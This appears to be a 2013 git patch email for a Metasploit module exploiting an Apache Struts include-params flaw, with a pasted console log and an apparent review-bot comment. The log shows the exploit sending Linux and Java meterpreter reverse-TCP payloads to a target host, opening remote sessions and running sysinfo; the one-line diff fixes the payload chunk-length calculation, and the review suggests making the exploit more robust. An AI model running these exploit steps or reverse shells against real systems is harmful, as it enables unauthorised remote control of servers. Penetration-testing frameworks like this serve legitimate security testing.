From ab6a2a049b5b7e62e3cf8f24dccfc2ab37998d36 Mon Sep 17 00:00:00 2001 
From: Console
Date: Thu, 30 May 2013 10:35:29 +0100
Subject: [PATCH] Fix issue with JAVA meterpreter failing to work.

Was down to the chunk length not being set correctly. Still need to test against windows.

```
msf exploit(struts_include_params) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Universal
   1   Linux Universal
   2   Java Universal

msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.0.1 - Meterpreter session 5 closed. Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!]
This exploit may require manual cleanup of: z4kv.jar meterpreter > sysinfo Computer : localhost.localdomain OS : Linux 2.6.32-358.2.1.el6.x86_64 (amd64) Meterpreter : java/java meterpreter > exit [*] Shutting down Meterpreter... ``` --- modules/exploits/multi/http/struts_include_params.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/struts_include_params.rb b/modules/exploits/multi/http/struts_include_params.rb index a58791c5586f..1eb830d4931c 100644 --- a/modules/exploits/multi/http/struts_include_params.rb +++ b/modules/exploits/multi/http/struts_include_params.rb @@ -135,7 +135,7 @@ def exploit print_status("Preparing payload...") #Now with all the arch specific stuff set, perform the upload. #109 = length of command string plus the max length of append. - sub_from_chunk = 109 + @payload_exe.length + target_uri.path.length + datastore['PARAMETER'].length + sub_from_chunk = 109 + @payload_exe.length + normalize_uri(target_uri.path).length + datastore['PARAMETER'].length chunk_length = 2048 - sub_from_chunk chunk_length = ((chunk_length/4).floor)*3 while pl_exe.length > chunk_length
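Review bot: the changed `sub_from_chunk` line now measures `normalize_uri(target_uri.path)`, but nothing in this hunk shows the request being built from that same value, so the length accounting and the URI actually sent can drift apart again, which is the class of bug this commit fixes. Compute the normalized URI once into a local and use it for both the length calculation and the request. Separately, `chunk_length = 2048 - sub_from_chunk` is used by the `while pl_exe.length > chunk_length` loop with no check that the result is still positive; when the path, parameter name and file name leave no room, the module should stop with a clear error rather than enter the loop. The constants 109 and 2048 would be easier to verify as named values with their derivation spelled out in the comment, and `.floor` is redundant on an integer division.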